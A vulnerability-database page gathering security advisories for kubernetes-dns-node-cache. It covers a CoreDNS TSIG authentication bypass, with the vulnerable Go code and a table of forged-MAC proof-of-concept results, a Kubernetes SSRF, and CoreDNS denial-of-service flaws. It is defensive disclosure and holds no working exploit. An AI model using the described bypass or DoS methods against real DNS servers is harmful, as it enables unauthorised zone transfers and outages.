Action not permitted
Modal body text goes here.
Modal Title
Modal Body
Vulnerability from cleanstart
Multiple security vulnerabilities affect the kubernetes-dns-node-cache package. These issues are resolved in later releases. See references for individual vulnerability details.
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "kubernetes-dns-node-cache"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.25.0-r2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the kubernetes-dns-node-cache package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-VJ54611",
"modified": "2026-05-20T18:52:19Z",
"published": "2026-05-21T08:11:44.432468Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-VJ54611.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-13281"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-47950"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-5187"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-58063"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-64702"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-68151"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26017"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26018"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32934"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-32936"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33190"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33489"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33811"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33814"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-35579"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39817"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39819"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39820"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39823"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39825"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39826"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39836"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42499"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42501"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2wpx-qpw2-g5h5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4x4m-3c2p-qppc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-527x-5wrf-22m2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-63cw-r7xf-jmwr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-93mf-426m-g6x9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c9v3-4pv7-87pr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cvx7-x8pj-x2gw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-g754-hx8w-x2g6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h75p-j8xm-m278"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h8mm-c463-wjq3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qhmp-q7xh-99rh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r6j8-c6r2-37rr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vp29-5652-4fw9"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13281"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47950"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5187"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58063"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64702"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68151"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26017"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26018"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32934"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32936"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33190"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33489"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33814"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35579"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39817"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39819"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39823"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39825"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39826"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39836"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42499"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42501"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-13281, CVE-2025-47950, CVE-2025-5187, CVE-2025-58063, CVE-2025-64702, CVE-2025-68151, CVE-2026-26017, CVE-2026-26018, CVE-2026-32934, CVE-2026-32936, CVE-2026-33190, CVE-2026-33489, CVE-2026-33811, CVE-2026-33814, CVE-2026-35579, CVE-2026-39817, CVE-2026-39819, CVE-2026-39820, CVE-2026-39823, CVE-2026-39825, CVE-2026-39826, CVE-2026-39836, CVE-2026-42499, CVE-2026-42501, ghsa-2wpx-qpw2-g5h5, ghsa-4x4m-3c2p-qppc, ghsa-527x-5wrf-22m2, ghsa-63cw-r7xf-jmwr, ghsa-93mf-426m-g6x9, ghsa-c9v3-4pv7-87pr, ghsa-cvx7-x8pj-x2gw, ghsa-g754-hx8w-x2g6, ghsa-h75p-j8xm-m278, ghsa-h8mm-c463-wjq3, ghsa-qhmp-q7xh-99rh, ghsa-r6j8-c6r2-37rr, ghsa-vp29-5652-4fw9 applied in versions: 1.25.0-r2",
"upstream": [
"CVE-2025-13281",
"CVE-2025-47950",
"CVE-2025-5187",
"CVE-2025-58063",
"CVE-2025-64702",
"CVE-2025-68151",
"CVE-2026-26017",
"CVE-2026-26018",
"CVE-2026-32934",
"CVE-2026-32936",
"CVE-2026-33190",
"CVE-2026-33489",
"CVE-2026-33811",
"CVE-2026-33814",
"CVE-2026-35579",
"CVE-2026-39817",
"CVE-2026-39819",
"CVE-2026-39820",
"CVE-2026-39823",
"CVE-2026-39825",
"CVE-2026-39826",
"CVE-2026-39836",
"CVE-2026-42499",
"CVE-2026-42501",
"ghsa-2wpx-qpw2-g5h5",
"ghsa-4x4m-3c2p-qppc",
"ghsa-527x-5wrf-22m2",
"ghsa-63cw-r7xf-jmwr",
"ghsa-93mf-426m-g6x9",
"ghsa-c9v3-4pv7-87pr",
"ghsa-cvx7-x8pj-x2gw",
"ghsa-g754-hx8w-x2g6",
"ghsa-h75p-j8xm-m278",
"ghsa-h8mm-c463-wjq3",
"ghsa-qhmp-q7xh-99rh",
"ghsa-r6j8-c6r2-37rr",
"ghsa-vp29-5652-4fw9"
]
}
GHSA-VP29-5652-4FW9
Vulnerability from github – Published: 2026-04-28 22:54 – Updated: 2026-05-08 15:30Summary
The gRPC, QUIC, DoH, and DoH3 transports in CoreDNS incorrectly handle TSIG authentication.
For gRPC and QUIC, CoreDNS checks whether the TSIG key name exists in the config, but does not actually verify the TSIG HMAC. If the key name matches, tsigStatus remains nil and the tsig plugin treats the request as "verified".
For DoH and DoH3, the issue is worse: TSIG is not verified at all. The DoH response writer has TsigStatus() hardcoded to return nil, so any request containing a TSIG record is treated as authenticated, even if the key name is invalid and the MAC is garbage.
As a result, attackers may bypass TSIG authentication on affected transports and access TSIG-protected functionality such as AXFR/IXFR zone transfers, dynamic updates, or other TSIG-gated plugin behavior.
Details
In server_grpc.go and server_quic.go, the TSIG handling checks whether the TSIG key name exists, but does not call dns.TsigVerify().
Relevant code before fix:
if tsig := msg.IsTsig(); tsig != nil {
if s.tsigSecret == nil {
w.tsigStatus = dns.ErrSecret
} else if _, ok := s.tsigSecret[tsig.Hdr.Name]; !ok {
w.tsigStatus = dns.ErrSecret
}
// key found -> nothing happens -> tsigStatus stays nil -> "verified"
}
This means that for gRPC and QUIC, a request with a known TSIG key name but an invalid MAC is accepted as authenticated.
PRs #7943 and #7947 partially addressed this area by adding key name checks for gRPC and QUIC, but did not add HMAC verification.
The DoH and DoH3 paths have an even weaker failure mode. In https.go, DoHWriter.TsigStatus() returned nil unconditionally:
func (d *DoHWriter) TsigStatus() error {
return nil
}
In server_https.go, the incoming DNS message is unpacked from the HTTP request and passed directly into ServeDNS() without checking msg.IsTsig(), without looking up the TSIG key name, and without calling dns.TsigVerify().
The same pattern exists in the DoH3 path in server_https3.go.
The effective DoH/DoH3 flow before the fix was:
- HTTP or HTTP/3 request arrives.
- DNS message is unpacked from the request.
- A
DoHWriteris created. - The message is passed to
ServeDNS(). - The tsig plugin checks
w.TsigStatus(). TsigStatus()returns nil.- nil is interpreted as successful TSIG verification.
This means that for DoH and DoH3, CoreDNS did not even require a valid TSIG key name. Any TSIG record was enough to satisfy the tsig plugin, regardless of key name or MAC contents.
PoC
Setup: built CoreDNS from master at commit 12d9457 and also verified against the v1.14.2 release binary. Configured a single test zone with 9 records and tsig { require all }.
Listeners used the same TSIG configuration and key:
- TCP on port 1053, using the normal
dns.Serverpath where TSIG HMAC verification works correctly - gRPC on port 1443, using manual TSIG handling
- DoH on port 8443
- DoH3 with the same TSIG configuration
gRPC / QUIC behavior
A test client sent AXFR requests over gRPC with a valid TSIG key name but forged MAC values. The same requests were sent over TCP for comparison.
| MAC used | gRPC | TCP |
|---|---|---|
| 32 zero bytes | BYPASS, 9 records returned | BADSIG |
| 32 random bytes | BYPASS, 9 records returned | BADSIG |
| HMAC computed with wrong secret | BYPASS, 9 records returned | BADSIG |
| truncated to 16 bytes | BYPASS, 9 records returned | BADSIG |
single byte 0x41 |
BYPASS, 9 records returned | BADSIG |
| empty MAC | BYPASS, 9 records returned | BADSIG |
| wrong key name + zero MAC | REJECTED, NOTAUTH/BADKEY | REJECTED, NOTAUTH/BADKEY |
6 out of 7 forged TSIG requests bypassed authentication over gRPC and returned a full zone transfer. The only rejected case was the wrong key name, because the gRPC path checked whether the key name existed.
The same class applied to QUIC.
DoH / DoH3 behavior
For DoH, a test client sent DNS queries over HTTPS POST to /dns-query with forged TSIG records. These requests were also compared against TCP.
| TSIG variant | DoH result | TCP result |
|---|---|---|
| 32 zero bytes | BYPASS, NOERROR | BADSIG |
| 32 random bytes | BYPASS, NOERROR | BADSIG |
| HMAC computed with wrong secret | BYPASS, NOERROR | BADSIG |
| truncated to 16 bytes | BYPASS, NOERROR | BADSIG |
single byte 0x41 |
BYPASS, NOERROR | BADSIG |
| empty MAC | BYPASS, NOERROR | BADSIG |
| bad key name | BYPASS, NOERROR | NOTAUTH/BADKEY |
| no TSIG record | REJECTED, REFUSED | REJECTED, REFUSED |
7 out of 8 cases bypassed authentication over DoH. Every request containing a TSIG record was accepted, including requests with an invalid key name.
An AXFR request over DoH with a forged TSIG record using a zero-byte MAC returned the full test zone.
The same pattern applies to DoH3 because it used the same DoHWriter TSIG behavior and did not verify TSIG before passing the message into the plugin chain.
To confirm that the tsig plugin itself was enforcing policy, requests with no TSIG record were rejected with REFUSED. The bypass happens because the transport layer reports successful TSIG verification when verification either did not happen or only checked the key name.
Impact
An unauthenticated network attacker may bypass TSIG authentication on affected CoreDNS transports.
Depending on configuration, this may allow an attacker to:
- perform AXFR or IXFR zone transfers over affected transports
- dump TSIG-protected zone data
- submit dynamic DNS updates if enabled
- bypass other TSIG-gated plugin behavior
- authenticate over DoH or DoH3 without knowing a valid TSIG key name
The DoH and DoH3 variants have a lower exploitation bar than gRPC and QUIC because the attacker does not need to know a configured TSIG key name. Any TSIG record is treated as valid.
Affected transports
- gRPC
- QUIC
- DoH
- DoH3
Workarounds
If upgrading is not immediately possible:
- Disable gRPC, QUIC, DoH, and DoH3 listeners where TSIG authentication is required.
- Restrict network-level access to affected transport ports to trusted sources only.
- Avoid exposing TSIG-protected functionality such as AXFR, IXFR, or dynamic updates over affected transports.
Fix
Affected transports must verify TSIG before passing the DNS message into the plugin chain.
For requests containing a TSIG record, the transport should:
- check whether TSIG secrets are configured
- verify that the TSIG key name exists
- call
dns.TsigVerify()against the original wire-format message - store the resulting status in the response writer
- return that status from
TsigStatus()
A successful key name lookup alone is not sufficient. A nil TSIG status must only be returned after successful HMAC verification.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35579"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-28T22:54:32Z",
"nvd_published_at": "2026-05-05T21:16:22Z",
"severity": "HIGH"
},
"details": "### Summary\n\nThe gRPC, QUIC, DoH, and DoH3 transports in CoreDNS incorrectly handle TSIG authentication.\n\nFor gRPC and QUIC, CoreDNS checks whether the TSIG key name exists in the config, but does not actually verify the TSIG HMAC. If the key name matches, `tsigStatus` remains nil and the tsig plugin treats the request as \"verified\".\n\nFor DoH and DoH3, the issue is worse: TSIG is not verified at all. The DoH response writer has `TsigStatus()` hardcoded to return nil, so any request containing a TSIG record is treated as authenticated, even if the key name is invalid and the MAC is garbage.\n\nAs a result, attackers may bypass TSIG authentication on affected transports and access TSIG-protected functionality such as AXFR/IXFR zone transfers, dynamic updates, or other TSIG-gated plugin behavior.\n\n### Details\n\nIn `server_grpc.go` and `server_quic.go`, the TSIG handling checks whether the TSIG key name exists, but does not call `dns.TsigVerify()`.\n\nRelevant code before fix:\n\n```go\nif tsig := msg.IsTsig(); tsig != nil {\n if s.tsigSecret == nil {\n w.tsigStatus = dns.ErrSecret\n } else if _, ok := s.tsigSecret[tsig.Hdr.Name]; !ok {\n w.tsigStatus = dns.ErrSecret\n }\n // key found -\u003e nothing happens -\u003e tsigStatus stays nil -\u003e \"verified\"\n}\n```\n\nThis means that for gRPC and QUIC, a request with a known TSIG key name but an invalid MAC is accepted as authenticated.\n\nPRs #7943 and #7947 partially addressed this area by adding key name checks for gRPC and QUIC, but did not add HMAC verification.\n\nThe DoH and DoH3 paths have an even weaker failure mode. In `https.go`, `DoHWriter.TsigStatus()` returned nil unconditionally:\n\n```go\nfunc (d *DoHWriter) TsigStatus() error {\n return nil\n}\n```\n\nIn `server_https.go`, the incoming DNS message is unpacked from the HTTP request and passed directly into `ServeDNS()` without checking `msg.IsTsig()`, without looking up the TSIG key name, and without calling `dns.TsigVerify()`.\n\nThe same pattern exists in the DoH3 path in `server_https3.go`.\n\nThe effective DoH/DoH3 flow before the fix was:\n\n1. HTTP or HTTP/3 request arrives.\n2. DNS message is unpacked from the request.\n3. A `DoHWriter` is created.\n4. The message is passed to `ServeDNS()`.\n5. The tsig plugin checks `w.TsigStatus()`.\n6. `TsigStatus()` returns nil.\n7. nil is interpreted as successful TSIG verification.\n\nThis means that for DoH and DoH3, CoreDNS did not even require a valid TSIG key name. Any TSIG record was enough to satisfy the tsig plugin, regardless of key name or MAC contents.\n\n### PoC\n\nSetup: built CoreDNS from master at commit `12d9457` and also verified against the v1.14.2 release binary. Configured a single test zone with 9 records and `tsig { require all }`.\n\nListeners used the same TSIG configuration and key:\n\n- TCP on port 1053, using the normal `dns.Server` path where TSIG HMAC verification works correctly\n- gRPC on port 1443, using manual TSIG handling\n- DoH on port 8443\n- DoH3 with the same TSIG configuration\n\n#### gRPC / QUIC behavior\n\nA test client sent AXFR requests over gRPC with a valid TSIG key name but forged MAC values. The same requests were sent over TCP for comparison.\n\n| MAC used | gRPC | TCP |\n|----------|------|-----|\n| 32 zero bytes | BYPASS, 9 records returned | BADSIG |\n| 32 random bytes | BYPASS, 9 records returned | BADSIG |\n| HMAC computed with wrong secret | BYPASS, 9 records returned | BADSIG |\n| truncated to 16 bytes | BYPASS, 9 records returned | BADSIG |\n| single byte `0x41` | BYPASS, 9 records returned | BADSIG |\n| empty MAC | BYPASS, 9 records returned | BADSIG |\n| wrong key name + zero MAC | REJECTED, NOTAUTH/BADKEY | REJECTED, NOTAUTH/BADKEY |\n\n6 out of 7 forged TSIG requests bypassed authentication over gRPC and returned a full zone transfer. The only rejected case was the wrong key name, because the gRPC path checked whether the key name existed.\n\nThe same class applied to QUIC.\n\n#### DoH / DoH3 behavior\n\nFor DoH, a test client sent DNS queries over HTTPS POST to `/dns-query` with forged TSIG records. These requests were also compared against TCP.\n\n| TSIG variant | DoH result | TCP result |\n|-------------|------------|------------|\n| 32 zero bytes | BYPASS, NOERROR | BADSIG |\n| 32 random bytes | BYPASS, NOERROR | BADSIG |\n| HMAC computed with wrong secret | BYPASS, NOERROR | BADSIG |\n| truncated to 16 bytes | BYPASS, NOERROR | BADSIG |\n| single byte `0x41` | BYPASS, NOERROR | BADSIG |\n| empty MAC | BYPASS, NOERROR | BADSIG |\n| bad key name | BYPASS, NOERROR | NOTAUTH/BADKEY |\n| no TSIG record | REJECTED, REFUSED | REJECTED, REFUSED |\n\n7 out of 8 cases bypassed authentication over DoH. Every request containing a TSIG record was accepted, including requests with an invalid key name.\n\nAn AXFR request over DoH with a forged TSIG record using a zero-byte MAC returned the full test zone.\n\nThe same pattern applies to DoH3 because it used the same `DoHWriter` TSIG behavior and did not verify TSIG before passing the message into the plugin chain.\n\nTo confirm that the tsig plugin itself was enforcing policy, requests with no TSIG record were rejected with `REFUSED`. The bypass happens because the transport layer reports successful TSIG verification when verification either did not happen or only checked the key name.\n\n### Impact\n\nAn unauthenticated network attacker may bypass TSIG authentication on affected CoreDNS transports.\n\nDepending on configuration, this may allow an attacker to:\n\n- perform AXFR or IXFR zone transfers over affected transports\n- dump TSIG-protected zone data\n- submit dynamic DNS updates if enabled\n- bypass other TSIG-gated plugin behavior\n- authenticate over DoH or DoH3 without knowing a valid TSIG key name\n\nThe DoH and DoH3 variants have a lower exploitation bar than gRPC and QUIC because the attacker does not need to know a configured TSIG key name. Any TSIG record is treated as valid.\n\n### Affected transports\n\n- gRPC\n- QUIC\n- DoH\n- DoH3\n\n### Workarounds\n\nIf upgrading is not immediately possible:\n\n- Disable gRPC, QUIC, DoH, and DoH3 listeners where TSIG authentication is required.\n- Restrict network-level access to affected transport ports to trusted sources only.\n- Avoid exposing TSIG-protected functionality such as AXFR, IXFR, or dynamic updates over affected transports.\n\n### Fix\n\nAffected transports must verify TSIG before passing the DNS message into the plugin chain.\n\nFor requests containing a TSIG record, the transport should:\n\n1. check whether TSIG secrets are configured\n2. verify that the TSIG key name exists\n3. call `dns.TsigVerify()` against the original wire-format message\n4. store the resulting status in the response writer\n5. return that status from `TsigStatus()`\n\nA successful key name lookup alone is not sufficient. A nil TSIG status must only be returned after successful HMAC verification.",
"id": "GHSA-vp29-5652-4fw9",
"modified": "2026-05-08T15:30:59Z",
"published": "2026-04-28T22:54:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-vp29-5652-4fw9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35579"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CoreDNS has TSIG authentication bypass on gRPC and QUIC transports"
}
GHSA-R6J8-C6R2-37RR
Vulnerability from github – Published: 2025-12-15 00:30 – Updated: 2025-12-20 03:27A half-blind Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager when using the in-tree Portworx StorageClass. This vulnerability allows authorized users to leak arbitrary information from unprotected endpoints in the control plane’s host network (including link-local or loopback services).
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.32.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "1.33.0-alpha.0"
},
{
"fixed": "1.33.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes"
},
"ranges": [
{
"events": [
{
"introduced": "1.34.0-alpha.0"
},
{
"fixed": "1.34.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-13281"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-16T00:48:30Z",
"nvd_published_at": "2025-12-14T22:15:36Z",
"severity": "MODERATE"
},
"details": "A half-blind Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager when using the in-tree Portworx StorageClass. This vulnerability allows authorized users to leak arbitrary information from unprotected endpoints in the control plane\u2019s host network (including link-local or loopback services).",
"id": "GHSA-r6j8-c6r2-37rr",
"modified": "2025-12-20T03:27:50Z",
"published": "2025-12-15T00:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13281"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/issues/135525"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/commit/7506ce804c20696ba32cdb72126270ceaed06e24"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/commit/97650c1c4fe15cbb7756ba95b3edc8a8665063ca"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/commit/dbe17dfe7773563eac95534040f413ada6d2b421"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-r6j8-c6r2-37rr"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubernetes/kubernetes"
},
{
"type": "WEB",
"url": "https://groups.google.com/g/kubernetes-security-announce/c/EORqZg0k1l4/m/TtD-q0v7AgAJ"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/12/01/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "kube-controller-manager is vulnerable to half-blind Server Side Request Forgery through in-tree Portworx StorageClass"
}
GHSA-527X-5WRF-22M2
Vulnerability from github – Published: 2026-01-08 20:12 – Updated: 2026-01-08 20:12Multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints.
Impact
1. Missing connection and stream limits (gRPC / HTTPS / HTTP3)
The affected servers do not enforce reasonable upper bounds on concurrent connections or active streams. An attacker can:
- Open many parallel connections
- Rapidly issue requests without limit
- Consume memory until the CoreDNS process becomes unresponsive or is terminated by the OOM killer
Testing demonstrates that modest resource configurations (e.g., 256 MB RAM) can be exhausted quickly. Increasing concurrency parameters in the PoCs allows attackers to scale the impact.
2. Missing message-size validation in the gRPC server
The gRPC server accepts arbitrarily large protobuf messages (default limit ~4 MB per request) without validating against DNS protocol constraints (maximum 64 KB). Sending multiple concurrent oversized messages can quickly exhaust available memory.
This vulnerability mirrors earlier hardening work in PR https://github.com/coredns/coredns/pull/7490, which applied checks for upstream proxying but left server-side request validation unprotected.
Result:
In all cases, remote unauthenticated attackers can reliably trigger memory exhaustion and cause a denial of service.
Patches
v1.14.0
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68151"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-08T20:12:58Z",
"nvd_published_at": "2026-01-08T16:15:59Z",
"severity": "MODERATE"
},
"details": "Multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints.\n\n### Impact\n\n#### 1. Missing connection and stream limits (gRPC / HTTPS / HTTP3)\n\nThe affected servers do not enforce reasonable upper bounds on concurrent connections or active streams. An attacker can:\n\n- Open many parallel connections\n- Rapidly issue requests without limit\n- Consume memory until the CoreDNS process becomes unresponsive or is terminated by the OOM killer\n\nTesting demonstrates that modest resource configurations (e.g., 256 MB RAM) can be exhausted quickly. Increasing concurrency parameters in the PoCs allows attackers to scale the impact.\n\n#### 2. Missing message-size validation in the gRPC server\n\nThe gRPC server accepts arbitrarily large protobuf messages (default limit ~4 MB per request) without validating against DNS protocol constraints (maximum 64 KB). Sending multiple concurrent oversized messages can quickly exhaust available memory.\n\nThis vulnerability mirrors earlier hardening work in PR https://github.com/coredns/coredns/pull/7490, which applied checks for upstream proxying but left server-side request validation unprotected.\n\n#### Result:\nIn all cases, remote unauthenticated attackers can reliably trigger memory exhaustion and cause a denial of service.\n\n\n### Patches\n_v1.14.0_",
"id": "GHSA-527x-5wrf-22m2",
"modified": "2026-01-08T20:12:58Z",
"published": "2026-01-08T20:12:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68151"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/pull/7490"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "CoreDNS gRPC/HTTPS/HTTP3 servers lack resource limits, enabling DoS via unbounded connections and oversized messages"
}
GHSA-63CW-R7XF-JMWR
Vulnerability from github – Published: 2026-04-28 22:43 – Updated: 2026-06-12 19:25Summary
CoreDNS's DNS-over-HTTPS (DoH) GET path accepts oversized dns= query values and performs substantial request parsing, query unescaping, base64 decoding, and message unpacking work before returning 400 Bad Request.
A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to /dns-query?dns=... and force high CPU usage, large transient allocations, elevated garbage-collection pressure, and increased resident memory consumption even though the requests are ultimately rejected.
This is a denial-of-service issue caused by expensive pre-validation processing on the DoH GET path.
Details
The vulnerable flow is in plugin/pkg/doh/doh.go:
RequestToMsg()dispatches GET requests torequestToMsgGet():plugin/pkg/doh/doh.go:79-89requestToMsgGet()callsreq.URL.Query(), extractsdns, and passes it directly tobase64ToMsg():plugin/pkg/doh/doh.go:99-108base64ToMsg()decodes the full attacker-controlled value viab64Enc.DecodeString()and only then attempts to unpack it into a DNS message:plugin/pkg/doh/doh.go:121-130
Relevant snippet:
func requestToMsgGet(req *http.Request) (*dns.Msg, error) {
values := req.URL.Query()
b64, ok := values["dns"]
if !ok {
return nil, fmt.Errorf("no 'dns' query parameter found")
}
if len(b64) != 1 {
return nil, fmt.Errorf("multiple 'dns' query values found")
}
return base64ToMsg(b64[0])
}
func base64ToMsg(b64 string) (*dns.Msg, error) {
buf, err := b64Enc.DecodeString(b64)
if err != nil {
return nil, err
}
m := new(dns.Msg)
err = m.Unpack(buf)
return m, err
}
````
